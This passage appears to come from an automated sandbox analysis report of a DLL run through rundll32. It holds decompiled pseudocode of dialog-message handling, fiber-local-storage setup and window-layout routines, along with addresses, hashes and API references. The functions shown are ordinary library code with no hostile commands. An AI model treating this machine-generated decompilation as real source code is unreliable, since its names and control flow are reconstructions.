									_t193 = IsDialogMessageA( *( *(_t210 + 8) + 0x1c),  *(_t210 + 0xc));
									__eflags = _t193;
									if(_t193 != 0) {
										_t132 = E100220EE(_t210, GetFocus());
										__eflags = _t132 -  *(_t210 - 0x14);
										if(_t132 !=  *(_t210 - 0x14)) {
											E1000F9FD(_t180, _t185, _t193, GetFocus, E100220EE(_t210, GetFocus()));
											_pop(_t185);
										}
									}
									L50:
									_t122 = IsWindow( *(_t210 - 0x2c));
									__eflags = _t122;
									if(_t122 != 0) {
										E1000FA6A(_t185, _t210,  *(_t210 - 0x14), E100220EE(_t210, GetFocus()));
										_pop(_t188);
										_t127 = IsWindow( *(_t210 - 0x28));
										__eflags = _t127;
										if(_t127 != 0) {
											E1000FC18(_t188,  *(_t210 + 8),  *(_t210 - 0x14), E100220EE(_t210, GetFocus()));
										}
									}
									_t123 = _t193;
									goto L54;
								}
								__eflags = _t185 - 0x26;
								if(_t185 <= 0x26) {
									 *(_t210 - 0x24) = 1;
									L81:
									_t136 = E1000F57E( *(_t210 - 0x14), _t192);
									__eflags = _t136 & 0x00000001;
									if((_t136 & 0x00000001) != 0) {
										goto L47;
									}
									__eflags =  *(_t210 - 0x24);
									_t185 =  *(_t210 + 8);
									_push(0);
									if( *(_t210 - 0x24) == 0) {
										_t137 = E10020753(_t185);
									} else {
										_t137 = E10020657(_t185);
									}
									_t206 = _t137;
									__eflags = _t206;
									if(_t206 == 0) {
										goto L47;
									} else {
										__eflags =  *(_t206 + 8);
										if( *(_t206 + 8) != 0) {
											_t185 =  *(_t210 + 8);
											E1002084F( *(_t210 + 8), _t206);
										}
										__eflags =  *(_t206 + 4);
										if( *(_t206 + 4) == 0) {
											_t138 =  *_t206;
											__eflags = _t138;
											if(_t138 == 0) {
												_t185 =  *(_t210 + 8);
												_t139 = E1000F62D( *(_t210 + 8),  *(_t210 - 0x14),  *(_t210 - 0x24));
											} else {
												_t139 = E100220EE(_t210, _t138);
											}
											_t195 = _t139;
											__eflags = _t195;
											if(_t195 == 0) {
												goto L47;
											} else {
												 *((intOrPtr*)( *((intOrPtr*)( *(_t210 + 8) + 0x48)) + 0x6c)) = 0;
												E1000F667(_t195);
												__eflags =  *(_t206 + 8);
												if( *(_t206 + 8) != 0) {
													SendMessageA( *(_t195 + 0x1c), 0xf1, 1, 0);
												}
												goto L90;
											}
										} else {
											_t185 =  *(_t206 + 4);
											 *((intOrPtr*)( *( *(_t206 + 4)) + 0xac))(_t192);
											L90:
											_t193 = 1;
											goto L50;
										}
									}
								}
								__eflags = _t185 - 0x28;
								if(_t185 <= 0x28) {
									goto L81;
								}
								__eflags = _t185 - 0x2b;
								if(_t185 != 0x2b) {
									goto L47;
								}
								L68:
								__eflags = _t119 & 0x00000004;
								if((_t119 & 0x00000004) != 0) {
									goto L47;
								}
								_t147 = E1000F60C( *(_t210 - 0x14));
								__eflags = _t147 & 0x00000010;
								_pop(_t185);
								if((_t147 & 0x00000010) == 0) {
									_t148 = E1000FBEB( *(_t210 + 8));
								} else {
									_t202 =  *(_t210 - 0x14);
									_t185 = _t202;
									_t148 = E10020354(_t202);
								}
								_t197 = 0;
								__eflags = _t202;
								 *((intOrPtr*)(_t210 - 0x20)) = _t148;
								if(_t202 != 0) {
									L76:
									_t185 = _t202;
									_t149 = E100203CE(_t202);
									__eflags = _t149;
									if(_t149 != 0) {
										__eflags =  *((intOrPtr*)(_t202 + 0x4c)) - _t197;
										if( *((intOrPtr*)(_t202 + 0x4c)) == _t197) {
											goto L47;
										}
										_push(_t197);
										_push(_t197);
										_push(_t197);
										_push(1);
										_push(0xfffffdd9);
										_push(_t202);
										 *(_t210 - 4) = _t197;
										E1002042B();
										 *(_t210 - 4) =  *(_t210 - 4) | 0xffffffff;
										goto L90;
									}
									MessageBeep(_t197);
									goto L47;
								} else {
									L75:
									_t202 = E1000FAE5( *(_t210 + 8),  *((intOrPtr*)(_t210 - 0x20)));
									__eflags = _t202 - _t197;
									if(_t202 == _t197) {
										goto L47;
									}
									goto L76;
								}
							}
							if(__eflags == 0) {
								L74:
								_t197 = 0;
								__eflags = 0;
								goto L75;
							}
							__eflags = _t185 - 3;
							if(_t185 == 3) {
								goto L74;
							}
							__eflags = _t185 - 9;
							if(_t185 == 9) {
								__eflags = _t119 & 0x00000002;
								if((_t119 & 0x00000002) != 0) {
									goto L47;
								}
								_t153 = GetKeyState(0x10);
								_t207 =  *(_t210 + 8);
								__eflags = _t153;
								_t180 = 0 | _t153 < 0x00000000;
								_t185 = _t207;
								_t154 = E1002057B(_t207, 0, _t153 < 0);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L47;
								}
								__eflags =  *(_t154 + 4);
								if( *(_t154 + 4) == 0) {
									_t155 =  *_t154;
									__eflags = _t155;
									if(_t155 == 0) {
										_t185 = _t207;
										_t156 = E10006C66(_t207,  *((intOrPtr*)(_t210 - 0x1c)), _t180);
									} else {
										_t156 = E100220EE(_t210, _t155);
									}
									_t198 = _t156;
									__eflags = _t198;
									if(_t198 != 0) {
										 *( *((intOrPtr*)(_t207 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t207 + 0x48)) + 0x6c) & 0x00000000;
										E1000F667(_t198);
										E1000FA6A(_t185, _t210,  *(_t210 - 0x14), _t198);
										_pop(_t185);
									}
								} else {
									_t160 =  *(_t154 + 4);
									_t185 = _t160;
									 *((intOrPtr*)( *_t160 + 0xac))(_t192);
								}
								goto L90;
							}
							__eflags = _t185 - 0xd;
							if(_t185 == 0xd) {
								goto L68;
							}
							goto L47;
						}
						_t163 = _t118;
						__eflags = _t163;
						if(_t163 == 0) {
							L33:
							_t164 = E1000F57E( *((intOrPtr*)(_t210 - 0x1c)), _t192);
							__eflags =  *(_t210 - 0x18) - 0x102;
							if( *(_t210 - 0x18) != 0x102) {
								L35:
								_t185 = _t192->wParam;
								__eflags = _t185 - 9;
								if(_t185 != 9) {
									L37:
									__eflags = _t185 - 0x20;
									if(__eflags != 0) {
										_t165 = E1000F922(_t180, _t185, __eflags,  *(_t210 + 8),  *((intOrPtr*)(_t210 - 0x1c)), _t192);
										__eflags = _t165;
										if(_t165 == 0) {
											goto L47;
										}
										_t166 =  *(_t165 + 4);
										__eflags = _t166;
										if(_t166 == 0) {
											goto L47;
										} else {
											_t185 = _t166;
											E1000A71A(_t166, _t192);
											goto L90;
										}
									}
									goto L38;
								}
								__eflags = _t164 & 0x00000002;
								if((_t164 & 0x00000002) != 0) {
									goto L47;
								}
								goto L37;
							}
							__eflags = _t164 & 0x00000084;
							if((_t164 & 0x00000084) != 0) {
								goto L47;
							}
							goto L35;
						}
						__eflags = _t163 != 4;
						if(_t163 != 4) {
							goto L47;
						}
						__eflags =  *(_t210 - 0x14);
						if( *(_t210 - 0x14) != 0) {
							L32:
							__eflags = _t192->wParam - 0x20;
							if(_t192->wParam == 0x20) {
								goto L47;
							}
							goto L33;
						}
						_t169 = GetKeyState(0x12);
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L47;
						}
						goto L32;
					} else {
						_t208 =  *(_t210 - 0x14);
						while( *(_t208 + 0x4c) == 0 && E100220EE(_t210, GetParent( *(_t208 + 0x1c))) !=  *(_t210 + 8)) {
							_t208 = E100220EE(_t210, GetParent( *(_t208 + 0x1c)));
							if(_t208 != 0) {
								continue;
							}
							break;
						}
						if(_t208 == 0) {
							L17:
							__eflags =  *(_t210 - 0x18) - 0x101;
							if( *(_t210 - 0x18) == 0x101) {
								L20:
								__eflags = _t208;
								if(_t208 == 0) {
									L26:
									_t192 =  *(_t210 + 0xc);
									goto L27;
								}
								_t209 =  *(_t208 + 0x4c);
								__eflags = _t209;
								if(_t209 == 0) {
									goto L26;
								}
								_t171 =  *(_t210 + 0xc)->wParam;
								__eflags = _t171 - 0xd;
								if(_t171 != 0xd) {
									L24:
									__eflags = _t171 - 0x1b;
									if(_t171 != 0x1b) {
										goto L26;
									}
									__eflags =  *(_t209 + 0x80) & 0x00000002;
									if(( *(_t209 + 0x80) & 0x00000002) != 0) {
										L38:
										_t123 = 0;
										L54:
										 *[fs:0x0] =  *((intOrPtr*)(_t210 - 0xc));
										return _t123;
									}
									goto L26;
								}
								__eflags =  *(_t209 + 0x80) & 0x00000001;
								if(( *(_t209 + 0x80) & 0x00000001) != 0) {
									goto L38;
								}
								goto L24;
							}
							__eflags =  *(_t210 - 0x18) - _t180;
							if( *(_t210 - 0x18) == _t180) {
								goto L20;
							}
							__eflags =  *(_t210 - 0x18) - 0x102;
							if( *(_t210 - 0x18) != 0x102) {
								goto L26;
							}
							goto L20;
						}
						_t172 =  *(_t208 + 0x4c);
						if(_t172 == 0 ||  *(_t172 + 0x54) == 0) {
							goto L17;
						} else {
							_t173 =  *(_t172 + 0x54);
							_t185 =  *_t173;
							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t210 + 0xc));
							if(_t174 != 0) {
								goto L17;
							} else {
								_t123 = _t174 + 1;
								goto L54;
							}
						}
					}
				}
			}

















































                                                                        0x1000fcf8
                                                                        0x1000fcfd
                                                                        0x1000fd05
                                                                        0x1000fd0d
                                                                        0x1000fd10
                                                                        0x1000fd1a
                                                                        0x1000fd12
                                                                        0x1000fd12
                                                                        0x1000fd12
                                                                        0x1000fd1d
                                                                        0x1000fd20
                                                                        0x1000fd23
                                                                        0x1000fd2d
                                                                        0x1000fd30
                                                                        0x1000fd35
                                                                        0x1000fd3c
                                                                        0x1000fd3f
                                                                        0x1000fd4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fd61
                                                                        0x1000fd61
                                                                        0x1000fd63
                                                                        0x1000fe0e
                                                                        0x1000fe15
                                                                        0x1000fe1b
                                                                        0x1000fe1d
                                                                        0x1000fe20
                                                                        0x1000fe20
                                                                        0x1000fe22
                                                                        0x1000fe29
                                                                        0x1000feb6
                                                                        0x1000febb
                                                                        0x1000febf
                                                                        0x1000fec2
                                                                        0x1000fffe
                                                                        0x10010001
                                                                        0x1000fee9
                                                                        0x1000fef8
                                                                        0x1000fefa
                                                                        0x1000fefc
                                                                        0x1000ff07
                                                                        0x1000ff0c
                                                                        0x1000ff0f
                                                                        0x1000ff1a
                                                                        0x1000ff1f
                                                                        0x1000ff1f
                                                                        0x1000ff0f
                                                                        0x1000ff20
                                                                        0x1000ff29
                                                                        0x1000ff2b
                                                                        0x1000ff2d
                                                                        0x1000ff41
                                                                        0x1000ff47
                                                                        0x1000ff4b
                                                                        0x1000ff4d
                                                                        0x1000ff4f
                                                                        0x1000ff60
                                                                        0x1000ff60
                                                                        0x1000ff4f
                                                                        0x1000ff65
                                                                        0x00000000
                                                                        0x1000ff65
                                                                        0x10010007
                                                                        0x1001000a
                                                                        0x100100b7
                                                                        0x100100be
                                                                        0x100100c2
                                                                        0x100100c7
                                                                        0x100100c9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100100cf
                                                                        0x100100d3
                                                                        0x100100d6
                                                                        0x100100d8
                                                                        0x100100e1
                                                                        0x100100da
                                                                        0x100100da
                                                                        0x100100da
                                                                        0x100100e6
                                                                        0x100100e8
                                                                        0x100100ea
                                                                        0x00000000
                                                                        0x100100f0
                                                                        0x100100f0
                                                                        0x100100f4
                                                                        0x100100f6
                                                                        0x100100fa
                                                                        0x100100fa
                                                                        0x100100ff
                                                                        0x10010103
                                                                        0x10010119
                                                                        0x1001011b
                                                                        0x1001011d
                                                                        0x1001012a
                                                                        0x10010130
                                                                        0x1001011f
                                                                        0x10010120
                                                                        0x10010120
                                                                        0x10010135
                                                                        0x10010137
                                                                        0x10010139
                                                                        0x00000000
                                                                        0x1001013f
                                                                        0x10010148
                                                                        0x1001014b
                                                                        0x10010150
                                                                        0x10010153
                                                                        0x10010160
                                                                        0x10010160
                                                                        0x00000000
                                                                        0x10010153
                                                                        0x10010105
                                                                        0x10010105
                                                                        0x1001010b
                                                                        0x10010111
                                                                        0x10010113
                                                                        0x00000000
                                                                        0x10010113
                                                                        0x10010103
                                                                        0x100100ea
                                                                        0x10010010
                                                                        0x10010013
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010019
                                                                        0x1001001c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010022
                                                                        0x10010022
                                                                        0x10010024
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001002d
                                                                        0x10010032
                                                                        0x10010034
                                                                        0x10010035
                                                                        0x10010046
                                                                        0x10010037
                                                                        0x10010037
                                                                        0x1001003a
                                                                        0x1001003c
                                                                        0x1001003c
                                                                        0x1001004b
                                                                        0x1001004d
                                                                        0x1001004f
                                                                        0x10010052
                                                                        0x1001006d
                                                                        0x1001006d
                                                                        0x1001006f
                                                                        0x10010074
                                                                        0x10010076
                                                                        0x10010084
                                                                        0x10010087
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001008d
                                                                        0x1001008e
                                                                        0x1001008f
                                                                        0x10010090
                                                                        0x10010092
                                                                        0x10010097
                                                                        0x10010098
                                                                        0x1001009b
                                                                        0x100100a3
                                                                        0x00000000
                                                                        0x100100a3
                                                                        0x10010079
                                                                        0x00000000
                                                                        0x10010054
                                                                        0x10010058
                                                                        0x10010063
                                                                        0x10010065
                                                                        0x10010067
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010067
                                                                        0x10010052
                                                                        0x1000fec8
                                                                        0x10010056
                                                                        0x10010056
                                                                        0x10010056
                                                                        0x00000000
                                                                        0x10010056
                                                                        0x1000fece
                                                                        0x1000fed1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fed7
                                                                        0x1000feda
                                                                        0x1000ff78
                                                                        0x1000ff7a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ff82
                                                                        0x1000ff88
                                                                        0x1000ff8d
                                                                        0x1000ff90
                                                                        0x1000ff93
                                                                        0x1000ff98
                                                                        0x1000ff9d
                                                                        0x1000ff9f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ffa5
                                                                        0x1000ffa9
                                                                        0x1000ffbe
                                                                        0x1000ffc0
                                                                        0x1000ffc2
                                                                        0x1000ffd0
                                                                        0x1000ffd2
                                                                        0x1000ffc4
                                                                        0x1000ffc5
                                                                        0x1000ffc5
                                                                        0x1000ffd7
                                                                        0x1000ffd9
                                                                        0x1000ffdb
                                                                        0x1000ffe4
                                                                        0x1000ffe9
                                                                        0x1000fff2
                                                                        0x1000fff8
                                                                        0x1000fff8
                                                                        0x1000ffab
                                                                        0x1000ffab
                                                                        0x1000ffb1
                                                                        0x1000ffb3
                                                                        0x1000ffb3
                                                                        0x00000000
                                                                        0x1000ffa9
                                                                        0x1000fee0
                                                                        0x1000fee3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fee3
                                                                        0x1000fe30
                                                                        0x1000fe30
                                                                        0x1000fe31
                                                                        0x1000fe5d
                                                                        0x1000fe61
                                                                        0x1000fe66
                                                                        0x1000fe6d
                                                                        0x1000fe73
                                                                        0x1000fe73
                                                                        0x1000fe77
                                                                        0x1000fe7b
                                                                        0x1000fe81
                                                                        0x1000fe81
                                                                        0x1000fe85
                                                                        0x1000fe95
                                                                        0x1000fe9a
                                                                        0x1000fe9c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe9e
                                                                        0x1000fea1
                                                                        0x1000fea3
                                                                        0x00000000
                                                                        0x1000fea5
                                                                        0x1000fea6
                                                                        0x1000fea8
                                                                        0x00000000
                                                                        0x1000fea8
                                                                        0x1000fea3
                                                                        0x00000000
                                                                        0x1000fe85
                                                                        0x1000fe7d
                                                                        0x1000fe7f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe7f
                                                                        0x1000fe6f
                                                                        0x1000fe71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe71
                                                                        0x1000fe33
                                                                        0x1000fe36
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe3c
                                                                        0x1000fe3f
                                                                        0x1000fe52
                                                                        0x1000fe52
                                                                        0x1000fe57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe57
                                                                        0x1000fe43
                                                                        0x1000fe49
                                                                        0x1000fe4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fd69
                                                                        0x1000fd69
                                                                        0x1000fd72
                                                                        0x1000fd93
                                                                        0x1000fd97
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fd97
                                                                        0x1000fd9b
                                                                        0x1000fdc0
                                                                        0x1000fdc0
                                                                        0x1000fdc7
                                                                        0x1000fdd7
                                                                        0x1000fdd7
                                                                        0x1000fdd9
                                                                        0x1000fe0b
                                                                        0x1000fe0b
                                                                        0x00000000
                                                                        0x1000fe0b
                                                                        0x1000fddb
                                                                        0x1000fdde
                                                                        0x1000fde0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fde5
                                                                        0x1000fde9
                                                                        0x1000fded
                                                                        0x1000fdfc
                                                                        0x1000fdfc
                                                                        0x1000fe00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe02
                                                                        0x1000fe09
                                                                        0x1000fe87
                                                                        0x1000fe87
                                                                        0x1000ff67
                                                                        0x1000ff6c
                                                                        0x1000ff75
                                                                        0x1000ff75
                                                                        0x00000000
                                                                        0x1000fe09
                                                                        0x1000fdef
                                                                        0x1000fdf6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fdf6
                                                                        0x1000fdc9
                                                                        0x1000fdcc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fdce
                                                                        0x1000fdd5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fdd5
                                                                        0x1000fd9d
                                                                        0x1000fda2
                                                                        0x00000000
                                                                        0x1000fdaa
                                                                        0x1000fdaa
                                                                        0x1000fdb0
                                                                        0x1000fdb3
                                                                        0x1000fdb8
                                                                        0x00000000
                                                                        0x1000fdba
                                                                        0x1000fdba
                                                                        0x00000000
                                                                        0x1000fdba
                                                                        0x1000fdb8
                                                                        0x1000fda2
                                                                        0x1000fd63

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                        • String ID:
                                                                        • API String ID: 2999224188-0
                                                                        • Opcode ID: fb21a70da8b2322adeae24ed3c2c6993691ff0b11f238f5cd034cdf1d19b064f
                                                                        • Instruction ID: 21539f8b15833155cbabaeec37cc23cdda9b79cec711f9471128e86a6a6d016e
                                                                        • Opcode Fuzzy Hash: fb21a70da8b2322adeae24ed3c2c6993691ff0b11f238f5cd034cdf1d19b064f
                                                                        • Instruction Fuzzy Hash: DFC1D33590024AAFEB21DB61C845ABE7BF5EF443D0F11402EF841AB566CB75EC80EB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10015384 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E10015384() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E100138E5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1004f5e0;
						 *0x1004f5e8 = _t16;
						if( *0x1004f5e0 == 0) {
							 *0x1004f5e0 = TlsGetValue;
							 *0x1004f5e4 = TlsSetValue;
							 *0x1004f5dc = E10015164;
							 *0x1004f5e8 = TlsFree;
						}
					}
					_t7 =  *0x1004f5dc(E1001520E);
					__eflags = _t7 - 0xffffffff;
					 *0x1004c848 = _t7;
					if(__eflags == 0) {
						L9:
						E1001516D();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E1001382A(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E1001516D();
					return 0;
				}
			}














                                                                        0x1001538b
                                                                        0x10015395
                                                                        0x100153a2
                                                                        0x100153a4
                                                                        0x100153a6
                                                                        0x100153a8
                                                                        0x100153bc
                                                                        0x100153c9
                                                                        0x100153d6
                                                                        0x100153db
                                                                        0x100153dd
                                                                        0x100153e4
                                                                        0x100153e9
                                                                        0x100153f0
                                                                        0x100153fa
                                                                        0x10015404
                                                                        0x1001540e
                                                                        0x1001540e
                                                                        0x100153e9
                                                                        0x10015418
                                                                        0x1001541e
                                                                        0x10015421
                                                                        0x10015426
                                                                        0x10015469
                                                                        0x10015469
                                                                        0x1001546e
                                                                        0x1001546e
                                                                        0x10015428
                                                                        0x1001542a
                                                                        0x10015430
                                                                        0x10015436
                                                                        0x10015438
                                                                        0x1001543c
                                                                        0x00000000
                                                                        0x1001543e
                                                                        0x10015445
                                                                        0x1001544b
                                                                        0x1001544d
                                                                        0x00000000
                                                                        0x1001544f
                                                                        0x1001544f
                                                                        0x10015456
                                                                        0x10015459
                                                                        0x1001545f
                                                                        0x10015463
                                                                        0x10015465
                                                                        0x10015465
                                                                        0x1001544d
                                                                        0x1001543c
                                                                        0x10015472
                                                                        0x1001538d
                                                                        0x1001538d
                                                                        0x10015394
                                                                        0x10015394

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                        • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                          • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                        • API String ID: 2355849793-282957996
                                                                        • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                        • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002D2D6 Relevance: 21.4, APIs: 14, Instructions: 397COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				void* _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct HDWP__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t188;
				signed int _t190;
				signed int _t192;
				intOrPtr* _t198;
				intOrPtr _t206;
				int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				signed int _t221;
				void* _t225;
				intOrPtr _t233;
				intOrPtr _t234;
				int _t243;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t273;
				signed int _t280;
				signed int _t287;
				intOrPtr* _t297;
				intOrPtr _t302;
				signed int _t310;
				signed int _t312;
				intOrPtr _t319;
				signed int _t325;
				intOrPtr _t326;
				signed int _t329;
				int _t334;
				intOrPtr* _t341;

				_t297 = __ecx;
				E1002F49A( &_v28, _a8, _a12);
				if(IsRectEmpty(_t297 + 0xac) != 0) {
					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
					_t188 = _v84.right - _v84.left;
					_t302 = _v84.bottom - _v84.top;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
					_t188 = _v68.right - _v68.left;
					_t302 = _v68.bottom - _v68.top;
				}
				_t334 = 0;
				_v44 = _t188;
				_v40 = _t302;
				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
				} else {
					_v132 = 0;
				}
				_t190 =  *0x1004efa0; // 0x2
				_v36 =  ~_t190;
				_t192 =  *0x1004efa4; // 0x2
				_v32 =  ~_t192;
				_v16 = _t334;
				_v12 = _t334;
				_v8 = _t334;
				if( *(_t297 + 0x9c) <= _t334) {
					L72:
					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
						EndDeferWindowPos(_v132);
					}
					SetRectEmpty( &_v100);
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
					if(_a8 == _t334 || _a12 == _t334) {
						if(_v28 != _t334) {
							_v28 = _v28 + _v100.left - _v100.right;
						}
					}
					if(_a8 == _t334 || _a12 != _t334) {
						if(_v24 != _t334) {
							_v24 = _v24 + _v100.top - _v100.bottom;
						}
					}
					_t198 = _a4;
					 *_t198 = _v28;
					 *((intOrPtr*)(_t198 + 4)) = _v24;
					return _t198;
				} else {
					do {
						_t341 = E1002CE0B(_t297, _v8);
						_v20 = _t341;
						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
						if(_t341 == _t334) {
							if(_t206 != _t334) {
								goto L71;
							}
							L58:
							_t208 = _v16;
							if(_t208 != _t334) {
								if(_a12 == _t334) {
									_t310 = _v36 + _t208 -  *0x1004efa0;
									_v36 = _t310;
									if(_v28 <= _t310) {
										_v28 = _t310;
									}
									_t210 = _v32;
									if(_v24 <= _t210) {
										_v24 = _t210;
									}
									_t211 =  *0x1004efa4; // 0x2
									_v32 =  ~_t211;
								} else {
									_t312 = _v32 + _t208 -  *0x1004efa4;
									_t214 = _v36;
									_v32 = _t312;
									if(_v28 <= _t214) {
										_v28 = _t214;
									}
									if(_v24 <= _t312) {
										_v24 = _t312;
									}
									_t215 =  *0x1004efa0; // 0x2
									_v36 =  ~_t215;
								}
								_v16 = _t334;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
							L51:
							if(_v12 != _t334) {
								goto L71;
							}
							L52:
